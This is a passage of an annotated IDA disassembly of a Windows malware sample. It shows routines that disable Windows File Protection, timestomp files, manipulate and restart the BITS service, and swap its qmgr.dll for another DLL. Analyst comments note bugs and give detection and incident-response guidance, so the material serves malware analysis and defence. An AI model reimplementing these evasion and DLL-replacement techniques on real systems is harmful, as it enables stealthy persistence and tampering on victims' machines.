.text:00401478 C3 retn
.text:00401478 CheckIfLocalAccountIsAdmin endp
.text:00401478
.text:00401478 ; ---------------------------------------------------------------------------
.text:00401479 90 90 90 90 90 90 90 align 10h
.text:00401480
.text:00401480 ; =============== S U B R O U T I N E =======================================
.text:00401480
.text:00401480
.text:00401480 ; Reviewer note: resolves sfc_os.dll ordinal 5 (labelled SetSfcFileException by the analyst),
.text:00401480 ; converts the caller's ANSI path to UTF-16 into a 208h-byte stack buffer and calls the ordinal
.text:00401480 ; with (0, lpWideCharStr, -1). LoadLibraryA, GetProcAddress and MultiByteToWideChar results are
.text:00401480 ; all unchecked, so a NULL esi would be called at 004014DE. The function's return value is
.text:00401480 ; whatever the ordinal returned in eax. Detection: LoadLibrary("sfc_os.dll") + GetProcAddress by
.text:00401480 ; ordinal from a non-Microsoft binary is a strong Windows File Protection tamper indicator.
.text:00401480 ; int __cdecl DisableWindowsFileProtection(LPCSTR lpMultiByteStr)
.text:00401480 DisableWindowsFileProtection proc near ; CODE XREF: WinMain(x,x,x,x)+317p
.text:00401480
.text:00401480 WideCharStr = word ptr -208h ; 104h WCHARs
.text:00401480 var_206 = byte ptr -206h
.text:00401480 lpMultiByteStr = dword ptr 4
.text:00401480
.text:00401480 81 EC 08 02 00 00 sub esp, 208h
.text:00401486 56 push esi
.text:00401487 57 push edi
.text:00401488 6A 05 push 5 ; Ordinal 5 == SetSfcFileException
.text:0040148A 68 28 31 40 00 push offset aSfc_os_dll ; "sfc_os.dll"
.text:0040148F FF 15 30 20 40 00 call ds:LoadLibraryA
.text:00401495 50 push eax ; hModule (unchecked)
.text:00401496 FF 15 2C 20 40 00 call ds:GetProcAddress
.text:0040149C 8B F0 mov esi, eax ; esi = ordinal 5 entry point (unchecked)
.text:0040149E B9 81 00 00 00 mov ecx, 81h
.text:004014A3 33 C0 xor eax, eax
.text:004014A5 8D 7C 24 0A lea edi, [esp+210h+var_206]
.text:004014A9 66 C7 44 24 08 00 00 mov [esp+210h+WideCharStr], 0
.text:004014B0 68 04 01 00 00 push 104h ; cchWideChar
.text:004014B5 F3 AB rep stosd ; zero the whole 208h-byte wide buffer (2 + 81h*4 + 2 bytes)
.text:004014B7 8B 8C 24 18 02 00 00 mov ecx, [esp+214h+lpMultiByteStr]
.text:004014BE 66 AB stosw
.text:004014C0 8D 44 24 0C lea eax, [esp+214h+WideCharStr]
.text:004014C4 50 push eax ; lpWideCharStr
.text:004014C5 68 04 01 00 00 push 104h ; cbMultiByte (fixed byte count, not -1; reads 104h bytes of the caller's buffer)
.text:004014CA 51 push ecx ; lpMultiByteStr
.text:004014CB 6A 00 push 0 ; dwFlags
.text:004014CD 6A 00 push 0 ; CodePage (0 == CP_ACP)
.text:004014CF FF 15 34 20 40 00 call ds:MultiByteToWideChar ; result unchecked
.text:004014D5 8D 54 24 08 lea edx, [esp+210h+WideCharStr]
.text:004014D9 6A FF push 0FFFFFFFFh ; 3rd arg = -1
.text:004014DB 52 push edx ; 2nd arg = wide path
.text:004014DC 6A 00 push 0 ; 1st arg = 0
.text:004014DE FF D6 call esi ; sfc_os.dll ordinal 5
.text:004014E0 5F pop edi
.text:004014E1 5E pop esi
.text:004014E2 81 C4 08 02 00 00 add esp, 208h
.text:004014E8 C3 retn
.text:004014E8 DisableWindowsFileProtection endp
.text:004014E8
.text:004014E8 ; ---------------------------------------------------------------------------
.text:004014E9 90 90 90 90 90 90 90 align 10h
.text:004014F0
.text:004014F0 ; =============== S U B R O U T I N E =======================================
.text:004014F0
.text:004014F0
.text:004014F0 ; int __cdecl SetFakeQMGRToOriginalQMGRFiletime(int, LPCSTR lpFileName)
.text:004014F0 SetFakeQMGRToOriginalQMGRFiletime proc near
.text:004014F0 ; CODE XREF: WinMain(x,x,x,x)+36Cp
.text:004014F0 ; WinMain(x,x,x,x)+381p ...
.text:004014F0
.text:004014F0 ; Reviewer note: timestamp copy (timestomping). lpFileName (2nd arg) is opened GENERIC_READ and
.text:004014F0 ; its creation/last-access/last-write times are read with GetFileTime; arg_0 (1st arg) is opened
.text:004014F0 ; GENERIC_WRITE and receives them via SetFileTime. Returns 0 on success, -1 otherwise.
.text:004014F0 ; Handle hygiene is incomplete: the jumps to loc_401588 at 00401539 and 00401553 bypass
.text:004014F0 ; CloseHandle, leaking the handle(s) already opened.
.text:004014F0 ; IR note: files written by this sample will carry the source file's times, so timelines
.text:004014F0 ; should not rely on $STANDARD_INFORMATION timestamps alone.
.text:004014F0 LastWriteTime = _FILETIME ptr -18h
.text:004014F0 LastAccessTime = _FILETIME ptr -10h
.text:004014F0 CreationTime = _FILETIME ptr -8
.text:004014F0 arg_0 = dword ptr 4 ; target path (opened for write)
.text:004014F0 lpFileName = dword ptr 8 ; source path (opened for read)
.text:004014F0
.text:004014F0 83 EC 18 sub esp, 18h
.text:004014F3 8B 44 24 20 mov eax, [esp+18h+lpFileName]
.text:004014F7 56 push esi
.text:004014F8 8B 35 6C 20 40 00 mov esi, ds:CreateFileA
.text:004014FE 57 push edi
.text:004014FF 6A 00 push 0 ; hTemplateFile
.text:00401501 68 80 00 00 00 push 80h ; dwFlagsAndAttributes = FILE_ATTRIBUTE_NORMAL
.text:00401506 6A 03 push 3 ; dwCreationDisposition = OPEN_EXISTING
.text:00401508 6A 00 push 0 ; lpSecurityAttributes
.text:0040150A 6A 01 push 1 ; dwShareMode = FILE_SHARE_READ
.text:0040150C 68 00 00 00 80 push 80000000h ; dwDesiredAccess = GENERIC_READ
.text:00401511 50 push eax ; lpFileName (source)
.text:00401512 FF D6 call esi ; CreateFileA
.text:00401514 8B F8 mov edi, eax ; edi = source handle
.text:00401516 83 FF FF cmp edi, 0FFFFFFFFh
.text:00401519 74 6D jz short loc_401588
.text:0040151B 8B 4C 24 24 mov ecx, [esp+20h+arg_0]
.text:0040151F 6A 00 push 0 ; hTemplateFile
.text:00401521 68 80 00 00 00 push 80h ; dwFlagsAndAttributes
.text:00401526 6A 03 push 3 ; dwCreationDisposition = OPEN_EXISTING
.text:00401528 6A 00 push 0 ; lpSecurityAttributes
.text:0040152A 6A 01 push 1 ; dwShareMode
.text:0040152C 68 00 00 00 40 push 40000000h ; dwDesiredAccess = GENERIC_WRITE
.text:00401531 51 push ecx ; lpFileName (target = arg_0)
.text:00401532 FF D6 call esi ; CreateFileA
.text:00401534 8B F0 mov esi, eax ; esi = target handle
.text:00401536 83 FE FF cmp esi, 0FFFFFFFFh
.text:00401539 74 4D jz short loc_401588 ; leaks edi (source handle)
.text:0040153B 8D 54 24 08 lea edx, [esp+20h+LastWriteTime]
.text:0040153F 8D 44 24 10 lea eax, [esp+20h+LastAccessTime]
.text:00401543 52 push edx ; lpLastWriteTime
.text:00401544 8D 4C 24 1C lea ecx, [esp+24h+CreationTime]
.text:00401548 50 push eax ; lpLastAccessTime
.text:00401549 51 push ecx ; lpCreationTime
.text:0040154A 57 push edi ; hFile (source)
.text:0040154B FF 15 7C 20 40 00 call ds:GetFileTime
.text:00401551 85 C0 test eax, eax
.text:00401553 74 33 jz short loc_401588 ; leaks both handles
.text:00401555 8D 54 24 08 lea edx, [esp+20h+LastWriteTime]
.text:00401559 8D 44 24 10 lea eax, [esp+20h+LastAccessTime]
.text:0040155D 52 push edx ; lpLastWriteTime
.text:0040155E 8D 4C 24 1C lea ecx, [esp+24h+CreationTime]
.text:00401562 50 push eax ; lpLastAccessTime
.text:00401563 51 push ecx ; lpCreationTime
.text:00401564 56 push esi ; hFile (target)
.text:00401565 FF 15 38 20 40 00 call ds:SetFileTime
.text:0040156B 85 C0 test eax, eax
.text:0040156D 57 push edi ; hObject
.text:0040156E 8B 3D 78 20 40 00 mov edi, ds:CloseHandle
.text:00401574 74 0D jz short loc_401583 ; SetFileTime failed -> close both, return -1
.text:00401576 FF D7 call edi ; CloseHandle
.text:00401578 56 push esi ; hObject
.text:00401579 FF D7 call edi ; CloseHandle
.text:0040157B 5F pop edi
.text:0040157C 33 C0 xor eax, eax ; success -> 0
.text:0040157E 5E pop esi
.text:0040157F 83 C4 18 add esp, 18h
.text:00401582 C3 retn
.text:00401583 ; ---------------------------------------------------------------------------
.text:00401583
.text:00401583 loc_401583: ; CODE XREF: SetFakeQMGRToOriginalQMGRFiletime+84j
.text:00401583 FF D7 call edi ; CloseHandle
.text:00401585 56 push esi ; hObject
.text:00401586 FF D7 call edi ; CloseHandle
.text:00401588
.text:00401588 loc_401588: ; CODE XREF: SetFakeQMGRToOriginalQMGRFiletime+29j
.text:00401588 ; SetFakeQMGRToOriginalQMGRFiletime+49j ...
.text:00401588 ; failure exit: returns -1 (no CloseHandle on this path)
.text:00401588 5F pop edi
.text:00401589 83 C8 FF or eax, 0FFFFFFFFh
.text:0040158C 5E pop esi
.text:0040158D 83 C4 18 add esp, 18h
.text:00401590 C3 retn
.text:00401590 SetFakeQMGRToOriginalQMGRFiletime endp
.text:00401590
.text:00401590 ; ---------------------------------------------------------------------------
.text:00401591 90 90 90 90 90 90 90 90+ align 10h
.text:004015A0
.text:004015A0 ; =============== S U B R O U T I N E =======================================
.text:004015A0
.text:004015A0
.text:004015A0 ; Reviewer note: OpenSCManagerA(SC_MANAGER_ALL_ACCESS) -> OpenServiceA(SERVICE_ALL_ACCESS) ->
.text:004015A0 ; LockServiceDatabase -> ChangeServiceConfigA(hService, SERVICE_NO_CHANGE, dwStartType,
.text:004015A0 ; SERVICE_NO_CHANGE, NULL x7) -> UnlockServiceDatabase -> CloseServiceHandle x2.
.text:004015A0 ; Return value: the ChangeServiceConfigA BOOL on the full path, 0 (the NULL handle) on the two
.text:004015A0 ; early exits. It never returns -1, so WinMain's `cmp eax, 0FFFFFFFFh` after each call cannot
.text:004015A0 ; detect failure. The LockServiceDatabase result is not checked, and on ChangeServiceConfigA
.text:004015A0 ; failure (00401607) the lock and both SCM handles are leaked.
.text:004015A0 ; Detection: ChangeServiceConfigA altering the start type of "BITS" from an unsigned process.
.text:004015A0 ; int __cdecl ManipulateBITSService(LPCSTR lpServiceName, DWORD dwStartType)
.text:004015A0 ManipulateBITSService proc near ; CODE XREF: WinMain(x,x,x,x)+2E5p
.text:004015A0 ; WinMain(x,x,x,x)+3A2p
.text:004015A0
.text:004015A0 lpServiceName = dword ptr 4
.text:004015A0 dwStartType = dword ptr 8
.text:004015A0
.text:004015A0 53 push ebx
.text:004015A1 55 push ebp
.text:004015A2 56 push esi
.text:004015A3 57 push edi
.text:004015A4 68 3F 00 0F 00 push 0F003Fh ; dwDesiredAccess = SC_MANAGER_ALL_ACCESS
.text:004015A9 6A 00 push 0 ; lpDatabaseName
.text:004015AB 6A 00 push 0 ; lpMachineName
.text:004015AD FF 15 08 20 40 00 call ds:OpenSCManagerA
.text:004015B3 8B F0 mov esi, eax ; esi = hSCManager
.text:004015B5 85 F6 test esi, esi
.text:004015B7 75 05 jnz short loc_4015BE
.text:004015B9 5F pop edi ; SCM open failed -> returns eax == 0, not -1
.text:004015BA 5E pop esi
.text:004015BB 5D pop ebp
.text:004015BC 5B pop ebx
.text:004015BD C3 retn
.text:004015BE ; ---------------------------------------------------------------------------
.text:004015BE
.text:004015BE loc_4015BE: ; CODE XREF: ManipulateBITSService+17j
.text:004015BE 8B 44 24 14 mov eax, [esp+10h+lpServiceName]
.text:004015C2 68 FF 01 0F 00 push 0F01FFh ; dwDesiredAccess = SERVICE_ALL_ACCESS
.text:004015C7 50 push eax ; lpServiceName
.text:004015C8 56 push esi ; hSCManager
.text:004015C9 FF 15 0C 20 40 00 call ds:OpenServiceA
.text:004015CF 8B D8 mov ebx, eax ; ebx = hService
.text:004015D1 85 DB test ebx, ebx
.text:004015D3 75 05 jnz short loc_4015DA
.text:004015D5 5F pop edi ; OpenServiceA failed -> returns 0; hSCManager is leaked
.text:004015D6 5E pop esi
.text:004015D7 5D pop ebp
.text:004015D8 5B pop ebx
.text:004015D9 C3 retn
.text:004015DA ; ---------------------------------------------------------------------------
.text:004015DA
.text:004015DA loc_4015DA: ; CODE XREF: ManipulateBITSService+33j
.text:004015DA 56 push esi ; hSCManager
.text:004015DB FF 15 10 20 40 00 call ds:LockServiceDatabase ; SC_LOCK not checked for NULL
.text:004015E1 8B 4C 24 18 mov ecx, [esp+10h+dwStartType]
.text:004015E5 6A 00 push 0 ; lpDisplayName
.text:004015E7 6A 00 push 0 ; lpPassword
.text:004015E9 6A 00 push 0 ; lpServiceStartName
.text:004015EB 6A 00 push 0 ; lpDependencies
.text:004015ED 6A 00 push 0 ; lpdwTagId
.text:004015EF 6A 00 push 0 ; lpLoadOrderGroup
.text:004015F1 6A 00 push 0 ; lpBinaryPathName
.text:004015F3 6A FF push 0FFFFFFFFh ; dwErrorControl = SERVICE_NO_CHANGE
.text:004015F5 51 push ecx ; dwStartType (only field actually changed)
.text:004015F6 6A FF push 0FFFFFFFFh ; dwServiceType = SERVICE_NO_CHANGE
.text:004015F8 53 push ebx ; hService
.text:004015F9 8B E8 mov ebp, eax ; ebp = SC_LOCK
.text:004015FB FF 15 14 20 40 00 call ds:ChangeServiceConfigA
.text:00401601 8B F8 mov edi, eax ; edi = BOOL result
.text:00401603 85 FF test edi, edi
.text:00401605 75 05 jnz short loc_40160C
.text:00401607 5F pop edi ; failure -> returns 0 without unlocking or closing handles
.text:00401608 5E pop esi
.text:00401609 5D pop ebp
.text:0040160A 5B pop ebx
.text:0040160B C3 retn
.text:0040160C ; ---------------------------------------------------------------------------
.text:0040160C
.text:0040160C loc_40160C: ; CODE XREF: ManipulateBITSService+65j
.text:0040160C 55 push ebp ; ScLock
.text:0040160D FF 15 18 20 40 00 call ds:UnlockServiceDatabase
.text:00401613 56 push esi ; hSCObject
.text:00401614 8B 35 1C 20 40 00 mov esi, ds:CloseServiceHandle
.text:0040161A FF D6 call esi ; CloseServiceHandle
.text:0040161C 53 push ebx ; hSCObject
.text:0040161D FF D6 call esi ; CloseServiceHandle
.text:0040161F 8B C7 mov eax, edi ; return the ChangeServiceConfigA BOOL
.text:00401621 5F pop edi
.text:00401622 5E pop esi
.text:00401623 5D pop ebp
.text:00401624 5B pop ebx
.text:00401625 C3 retn
.text:00401625 ManipulateBITSService endp
.text:00401625
.text:00401625 ;
---------------------------------------------------------------------------
.text:00401626 90 90 90 90 90 90 90 90+ align 10h
.text:00401630
.text:00401630 ; =============== S U B R O U T I N E =======================================
.text:00401630
.text:00401630 ; Analyst notes (review): stops one service by name through the Service Control
.text:00401630 ; Manager. The service-name string is supplied by the caller (WinMain) and is not
.text:00401630 ; visible here; the IDA name says the target is BITS. Returns 0 on success and
.text:00401630 ; -1 (0FFFFFFFFh) if OpenSCManagerA, OpenServiceA or ControlService fails.
.text:00401630 ; The SERVICE_STATUS filled by ControlService is never read and there is no
.text:00401630 ; QueryServiceStatus wait loop, so "success" only means the stop request was
.text:00401630 ; accepted, not that the service has reached SERVICE_STOPPED.
.text:00401630 ; Detection: the SCM writes service state changes to the System event log
.text:00401630 ; (event 7036 when a service enters the stopped state); a user-mode process
.text:00401630 ; opening the SCM and a service with *_ALL_ACCESS is also useful telemetry.
.text:00401630 ; int __cdecl StopBITS(LPCSTR lpServiceName)
.text:00401630 StopBITS proc near ; CODE XREF: WinMain(x,x,x,x)+2FDp
.text:00401630
.text:00401630 ServiceStatus = _SERVICE_STATUS ptr -1Ch ; 1Ch = sizeof(SERVICE_STATUS); written by ControlService, never read
.text:00401630 lpServiceName = dword ptr 4
.text:00401630
.text:00401630 83 EC 1C sub esp, 1Ch ; local SERVICE_STATUS
.text:00401633 53 push ebx
.text:00401634 56 push esi
.text:00401635 57 push edi
.text:00401636 33 DB xor ebx, ebx ; ebx = 0: used as NULL below and as the result (0 = ok)
.text:00401638 68 3F 00 0F 00 push 0F003Fh ; dwDesiredAccess = SC_MANAGER_ALL_ACCESS
.text:0040163D 53 push ebx ; lpDatabaseName = NULL (active services database)
.text:0040163E 53 push ebx ; lpMachineName = NULL (local machine)
.text:0040163F FF 15 08 20 40 00 call ds:OpenSCManagerA
.text:00401645 8B F8 mov edi, eax ; edi = hSCManager
.text:00401647 85 FF test edi, edi
.text:00401649 75 0A jnz short loc_401655
.text:0040164B 5F pop edi ; OpenSCManagerA failed: return -1, nothing to close
.text:0040164C 5E pop esi
.text:0040164D 83 C8 FF or eax, 0FFFFFFFFh
.text:00401650 5B pop ebx
.text:00401651 83 C4 1C add esp, 1Ch
.text:00401654 C3 retn
.text:00401655 ; ---------------------------------------------------------------------------
.text:00401655
.text:00401655 loc_401655: ; CODE XREF: StopBITS+19j
.text:00401655 8B 44 24 2C mov eax, [esp+28h+lpServiceName]
.text:00401659 68 FF 01 0F 00 push 0F01FFh ; dwDesiredAccess = SERVICE_ALL_ACCESS (includes SERVICE_STOP)
.text:0040165E 50 push eax ; lpServiceName
.text:0040165F 57 push edi ; hSCManager
.text:00401660 FF 15 0C 20 40 00 call ds:OpenServiceA
.text:00401666 8B F0 mov esi, eax ; esi = hService, NULL on failure
.text:00401668 85 F6 test esi, esi
.text:0040166A 74 12 jz short loc_40167E ; OpenServiceA failed: result -1, but still close hSCManager
.text:0040166C 8D 4C 24 0C lea ecx, [esp+28h+ServiceStatus]
.text:00401670 51 push ecx ; lpServiceStatus (output only, never inspected)
.text:00401671 6A 01 push 1 ; dwControl = SERVICE_CONTROL_STOP
.text:00401673 56 push esi ; hService
.text:00401674 FF 15 04 20 40 00 call ds:ControlService
.text:0040167A 85 C0 test eax, eax
.text:0040167C 75 03 jnz short loc_401681 ; stop request accepted: ebx stays 0
.text:0040167E
.text:0040167E loc_40167E: ; CODE XREF: StopBITS+3Aj
.text:0040167E 83 CB FF or ebx, 0FFFFFFFFh ; result = -1
.text:00401681
.text:00401681 loc_401681: ; CODE XREF: StopBITS+4Cj
.text:00401681 57 push edi ; hSCObject = hSCManager
.text:00401682 8B 3D 1C 20 40 00 mov edi, ds:CloseServiceHandle
.text:00401688 FF D7 call edi ; CloseServiceHandle
.text:0040168A 85 F6 test esi, esi
.text:0040168C 74 03 jz short loc_401691 ; no service handle to close
.text:0040168E 56 push esi ; hSCObject = hService
.text:0040168F FF D7 call edi ; CloseServiceHandle
.text:00401691
.text:00401691 loc_401691: ; CODE XREF: StopBITS+5Cj
.text:00401691 5F pop edi
.text:00401692 8B C3 mov eax, ebx ; return 0 or -1
.text:00401694 5E pop esi
.text:00401695 5B pop ebx
.text:00401696 83 C4 1C add esp, 1Ch
.text:00401699 C3 retn
.text:00401699 StopBITS endp
.text:00401699
.text:00401699 ; ---------------------------------------------------------------------------
.text:0040169A 90 90 90 90 90 90 align 10h
.text:004016A0
.text:004016A0 ; =============== S U B R O U T I N E =======================================
.text:004016A0
.text:004016A0 ; Analyst notes (review): mirror image of StopBITS — opens the SCM and the
.text:004016A0 ; named service with *_ALL_ACCESS and calls StartServiceA with no arguments.
.text:004016A0 ; Same result convention: 0 on success, -1 on the first failing API. Called
.text:004016A0 ; from WinMain after the DLL replacement below, presumably so the replaced
.text:004016A0 ; service DLL gets loaded by the service host — confirm against WinMain.
.text:004016A0 ; int __cdecl StartBITS(LPCSTR lpServiceName)
.text:004016A0 StartBITS proc near ; CODE XREF: WinMain(x,x,x,x)+3B8p
.text:004016A0
.text:004016A0 lpServiceName = dword ptr 4
.text:004016A0
.text:004016A0 53 push ebx
.text:004016A1 56 push esi
.text:004016A2 57 push edi
.text:004016A3 33 DB xor ebx, ebx ; ebx = 0: NULL below and result (0 = ok)
.text:004016A5 68 3F 00 0F 00 push 0F003Fh ; dwDesiredAccess = SC_MANAGER_ALL_ACCESS
.text:004016AA 53 push ebx ; lpDatabaseName = NULL
.text:004016AB 53 push ebx ; lpMachineName = NULL (local machine)
.text:004016AC FF 15 08 20 40 00 call ds:OpenSCManagerA
.text:004016B2 8B F8 mov edi, eax ; edi = hSCManager
.text:004016B4 85 FF test edi, edi
.text:004016B6 75 07 jnz short loc_4016BF
.text:004016B8 5F pop edi ; OpenSCManagerA failed: return -1
.text:004016B9 5E pop esi
.text:004016BA 83 C8 FF or eax, 0FFFFFFFFh
.text:004016BD 5B pop ebx
.text:004016BE C3 retn
.text:004016BF ; ---------------------------------------------------------------------------
.text:004016BF
.text:004016BF loc_4016BF: ; CODE XREF: StartBITS+16j
.text:004016BF 8B 44 24 10 mov eax, [esp+0Ch+lpServiceName]
.text:004016C3 68 FF 01 0F 00 push 0F01FFh ; dwDesiredAccess = SERVICE_ALL_ACCESS
.text:004016C8 50 push eax ; lpServiceName
.text:004016C9 57 push edi ; hSCManager
.text:004016CA FF 15 0C 20 40 00 call ds:OpenServiceA
.text:004016D0 8B F0 mov esi, eax ; esi = hService, NULL on failure
.text:004016D2 85 F6 test esi, esi
.text:004016D4 74 0F jz short loc_4016E5 ; OpenServiceA failed: result -1
.text:004016D6 6A 00 push 0 ; lpServiceArgVectors = NULL
.text:004016D8 6A 00 push 0 ; dwNumServiceArgs = 0
.text:004016DA 56 push esi ; hService
.text:004016DB FF 15 00 20 40 00 call ds:StartServiceA
.text:004016E1 85 C0 test eax, eax
.text:004016E3 75 03 jnz short loc_4016E8 ; start accepted: ebx stays 0
.text:004016E5
.text:004016E5 loc_4016E5: ; CODE XREF: StartBITS+34j
.text:004016E5 83 CB FF or ebx, 0FFFFFFFFh ; result = -1
.text:004016E8
.text:004016E8 loc_4016E8: ; CODE XREF: StartBITS+43j
.text:004016E8 57 push edi ; hSCObject = hSCManager
.text:004016E9 8B 3D 1C 20 40 00 mov edi, ds:CloseServiceHandle
.text:004016EF FF D7 call edi ; CloseServiceHandle
.text:004016F1 85 F6 test esi, esi
.text:004016F3 74 03 jz short loc_4016F8 ; no service handle to close
.text:004016F5 56 push esi ; hSCObject = hService
.text:004016F6 FF D7 call edi ; CloseServiceHandle
.text:004016F8
.text:004016F8 loc_4016F8: ; CODE XREF: StartBITS+53j
.text:004016F8 5F pop edi
.text:004016F9 8B C3 mov eax, ebx ; return 0 or -1
.text:004016FB 5E pop esi
.text:004016FC 5B pop ebx
.text:004016FD C3 retn
.text:004016FD StartBITS endp
.text:004016FD
.text:004016FD ; ---------------------------------------------------------------------------
.text:004016FE 90 90 align 10h
.text:00401700
.text:00401700 ; =============== S U B R O U T I N E =======================================
.text:00401700
.text:00401700 ; Analyst notes (review): four file operations, in order, each aborting the
.text:00401700 ; function with -1 on failure and with no rollback of the earlier steps:
.text:00401700 ;  1. CopyFileA(lpExistingFileName -> lpNewFileName, overwrite)  — copy of the
.text:00401700 ;     source DLL (esi) to the first destination (arg 0).
.text:00401700 ;  2. MoveFileExA(arg_8 -> arg_4, MOVEFILE_REPLACE_EXISTING)    — renames the
.text:00401700 ;     original service DLL to a backup name (IDA comment: kernel64.dll).
.text:00401700 ;  3. CopyFileA(lpExistingFileName -> arg_8, overwrite)         — puts the
.text:00401700 ;     source DLL under the original's name.
.text:00401700 ;  4. FindFirstFileA(lpFileName): only if that path exists, CopyFileA the
.text:00401700 ;     source DLL there as well; a missing path is not an error (returns 0).
.text:00401700 ; The search handle from FindFirstFileA is never passed to FindClose (handle
.text:00401700 ; leak; only the existence test is used). No signature or version check is
.text:00401700 ; performed on any file. Detection/response: a system DLL renamed to an
.text:00401700 ; unusual name next to a new file carrying the original name — file-integrity
.text:00401700 ; monitoring of the system directory and verifying service-DLL hashes
.text:00401700 ; against known-good values surface this; the backup copy is also the
.text:00401700 ; recovery artefact.
.text:00401700 ; int __cdecl ReplaceOriginalQMGR_DLLwithEventSystem_DLL(LPCSTR lpNewFileName, int, int, LPCSTR lpExistingFileName, LPCSTR lpFileName)
.text:00401700 ReplaceOriginalQMGR_DLLwithEventSystem_DLL proc near
.text:00401700 ; CODE XREF: WinMain(x,x,x,x)+34Bp
.text:00401700
.text:00401700 FindFileData = _WIN32_FIND_DATAA ptr -140h ; 140h = sizeof(WIN32_FIND_DATAA); filled by FindFirstFileA, never read
.text:00401700 lpNewFileName = dword ptr 4
.text:00401700 arg_4 = dword ptr 8 ; backup name for the original DLL (MoveFileExA target)
.text:00401700 arg_8 = dword ptr 0Ch ; path of the original DLL (MoveFileExA source, then CopyFileA target)
.text:00401700 lpExistingFileName= dword ptr 10h ; source DLL copied in steps 1, 3 and 4
.text:00401700 lpFileName = dword ptr 14h ; optional second destination, probed with FindFirstFileA
.text:00401700
.text:00401700 8B 44 24 04 mov eax, [esp+lpNewFileName] ; read arg 0 before the frame is set up
.text:00401704 81 EC 40 01 00 00 sub esp, 140h ; local WIN32_FIND_DATAA
.text:0040170A 53 push ebx
.text:0040170B 56 push esi
.text:0040170C 8B B4 24 58 01 00 00 mov esi, [esp+148h+lpExistingFileName] ; esi = source DLL path for the whole function
.text:00401713 57 push edi
.text:00401714 8B 3D 44 20 40 00 mov edi, ds:CopyFileA ; edi = CopyFileA, reused for every copy
.text:0040171A 6A 00 push 0 ; bFailIfExists = FALSE (overwrite)
.text:0040171C 50 push eax ; lpNewFileName
.text:0040171D 56 push esi ; lpExistingFileName
.text:0040171E FF D7 call edi ; CopyFileA — step 1
.text:00401720 85 C0 test eax, eax
.text:00401722 75 0D jnz short CopyFileWorked
.text:00401724 5F pop edi ; step 1 failed: return -1
.text:00401725 5E pop esi
.text:00401726 83 C8 FF or eax, 0FFFFFFFFh
.text:00401729 5B pop ebx
.text:0040172A 81 C4 40 01 00 00 add esp, 140h
.text:00401730 C3 retn
.text:00401731 ; ---------------------------------------------------------------------------
.text:00401731
.text:00401731 CopyFileWorked: ; CODE XREF: ReplaceOriginalQMGR_DLLwithEventSystem_DLL+22j
.text:00401731 8B 8C 24 54 01 00 00 mov ecx, [esp+14Ch+arg_4] ; backup name
.text:00401738 8B 9C 24 58 01 00 00 mov ebx, [esp+14Ch+arg_8] ; original DLL path, kept in ebx for step 3
.text:0040173F 6A 01 push 1 ; dwFlags = MOVEFILE_REPLACE_EXISTING
.text:00401741 51 push ecx ; lpNewFileName
.text:00401742 53 push ebx ; lpExistingFileName
.text:00401743 FF 15 40 20 40 00 call ds:MoveFileExA ; step 2: backup original qmgr.dll as kernel64.dll
.text:00401749 85 C0 test eax, eax
.text:0040174B 75 0D jnz short loc_40175A
.text:0040174D 5F pop edi ; step 2 failed: return -1 (step 1 copy is left in place)
.text:0040174E 5E pop esi
.text:0040174F 83 C8 FF or eax, 0FFFFFFFFh
.text:00401752 5B pop ebx
.text:00401753 81 C4 40 01 00 00 add esp, 140h
.text:00401759 C3 retn
.text:0040175A ; ---------------------------------------------------------------------------
.text:0040175A
.text:0040175A loc_40175A: ; CODE XREF: ReplaceOriginalQMGR_DLLwithEventSystem_DLL+4Bj
.text:0040175A 6A 00 push 0 ; bFailIfExists = FALSE
.text:0040175C 53 push ebx ; lpNewFileName = original DLL path (now vacated by step 2)
.text:0040175D 56 push esi ; lpExistingFileName = source DLL
.text:0040175E FF D7 call edi ; CopyFileA — step 3
.text:00401760 85 C0 test eax, eax
.text:00401762 75 0D jnz short loc_401771
.text:00401764 5F pop edi ; step 3 failed: return -1 (original already renamed, no restore)
.text:00401765 5E pop esi
.text:00401766 83 C8 FF or eax, 0FFFFFFFFh
.text:00401769 5B pop ebx
.text:0040176A 81 C4 40 01 00 00 add esp, 140h
.text:00401770 C3 retn
.text:00401771 ; ---------------------------------------------------------------------------
.text:00401771
.text:00401771 loc_401771: ; CODE XREF: ReplaceOriginalQMGR_DLLwithEventSystem_DLL+62j
.text:00401771 8B 9C 24 60 01 00 00 mov ebx, [esp+14Ch+lpFileName] ; optional second destination
.text:00401778 8D 54 24 0C lea edx, [esp+14Ch+FindFileData]
.text:0040177C 52 push edx ; lpFindFileData (output only, never inspected)
.text:0040177D 53 push ebx ; lpFileName
.text:0040177E FF 15 54 20 40 00 call ds:FindFirstFileA ; existence probe; returned handle is never closed
.text:00401784 83 F8 FF cmp eax, 0FFFFFFFFh ; INVALID_HANDLE_VALUE = path does not exist
.text:00401787 74 17 jz short loc_4017A0 ; absent: skip step 4 and still return success
.text:00401789 6A 00 push 0 ; bFailIfExists = FALSE
.text:0040178B 53 push ebx ; lpNewFileName = lpFileName
.text:0040178C 56 push esi ; lpExistingFileName = source DLL
.text:0040178D FF D7 call edi ; CopyFileA — step 4
.text:0040178F 85 C0 test eax, eax
.text:00401791 75 0D jnz short loc_4017A0
.text:00401793 5F pop edi ; step 4 failed: return -1
.text:00401794 5E pop esi
.text:00401795 83 C8 FF or eax, 0FFFFFFFFh
.text:00401798 5B pop ebx
.text:00401799 81 C4 40 01 00 00 add esp, 140h
.text:0040179F C3 retn
.text:004017A0 ; ---------------------------------------------------------------------------
.text:004017A0
.text:004017A0 loc_4017A0: ; CODE XREF: ReplaceOriginalQMGR_DLLwithEventSystem_DLL+87j
.text:004017A0 ; ReplaceOriginalQMGR_DLLwithEventSystem_DLL+91j
.text:004017A0 5F pop edi
.text:004017A1 5E pop esi
.text:004017A2 33 C0 xor eax, eax ; return 0 = success
.text:004017A4 5B pop ebx
.text:004017A5 81 C4 40 01 00 00 add esp, 140h
.text:004017AB C3 retn
.text:004017AB ReplaceOriginalQMGR_DLLwithEventSystem_DLL endp
.text:004017AB
.text:004017AB ; ---------------------------------------------------------------------------
.text:004017AC 90 90 90 90 align 10h
.text:004017B0 ; [00000006 BYTES: COLLAPSED FUNCTION sprintf. PRESS KEYPAD "+" TO EXPAND]
.text:004017B6 ; [0000013E BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND]
.text:004018F4 ; ---------------------------------------------------------------------------
.text:004018F4 ; Analyst notes (review): the two fragments below follow the collapsed CRT
.text:004018F4 ; entry point `start` directly and look like the MSVC CRT startup
.text:004018F4 ; __try/__except pieces: a filter that forwards the exception code and
.text:004018F4 ; EXCEPTION_POINTERS to _XcptFilter, and a handler that restores esp and
.text:004018F4 ; calls _exit with the saved code. Compiler runtime rather than sample
